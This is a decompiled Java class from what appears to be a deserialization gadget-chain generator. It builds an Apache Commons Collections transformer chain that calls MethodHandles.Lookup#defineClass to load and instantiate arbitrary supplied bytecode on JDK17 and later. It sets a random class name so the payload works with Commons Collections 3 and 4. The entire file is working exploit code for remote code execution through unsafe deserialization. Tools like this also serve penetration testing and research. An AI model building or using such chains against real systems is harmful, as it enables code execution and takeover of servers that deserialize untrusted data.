package com.ar3h.chains.gadget.impl.javanative.commons.collections;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.util.CommonUtil;
import java.lang.invoke.MethodHandles;
import java.util.LinkedList;
import javax.resource.spi.work.WorkException;

@GadgetAnnotation(name = "MethodHandles 加载字节码", description = "jdk高版本使用 java.lang.invoke.MethodHandles.Lookup#defineClass 执行任意字节码\n例如 CC 3.2.1 反序列化链中, 字节码类型格式需要为: org.apache.commons.collections.functors.xxx, xxx为任意类名\n本链已实现自动设置字节码类名为 org.apache.commons.collections.functors.xxx", dependencies = {"jdk17"})
@GadgetTags(tags = {Tag.TransformerChains}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/commons/collections/TransformerWithMethodHandles.class */
public class TransformerWithMethodHandles extends AbstractTransformer {
    GadgetContext context;

    public Object getObject(byte[] bArr) throws Exception {
        LinkedList<Object> linkedList = new LinkedList<>();
        linkedList.add(createConstantTransformer(MethodHandles.class));
        linkedList.add(createInvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"lookup", new Class[0]}));
        linkedList.add(createInvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}));
        linkedList.add(createInvokerTransformer("defineClass", new Class[]{byte[].class}, new Object[]{bArr}));
        linkedList.add(createInstantiateTransformer(new Class[0], new Object[0]));
        linkedList.add(createConstantTransformer(1));
        return createTransformerArray(linkedList);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        String string = gadgetContext.getString(ContextTag.CC_VERSION);
        initClazz(string);
        initBytecodeClass(string);
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext));
    }

    public void initBytecodeClass(String str) {
        if (WorkException.TX_RECREATE_FAILED.equalsIgnoreCase(str)) {
            this.context.getEngine().setGadgetParam("className", "org.apache.commons.collections.functors." + CommonUtil.getRandomString(10));
        } else if ("4".equalsIgnoreCase(str)) {
            this.context.getEngine().setGadgetParam("className", "org.apache.commons.collections4.functors." + CommonUtil.getRandomString(10));
        } else {
            ThrowsUtil.throwNotFoundOptionGadgetException("'3' or '4'");
        }
    }
}
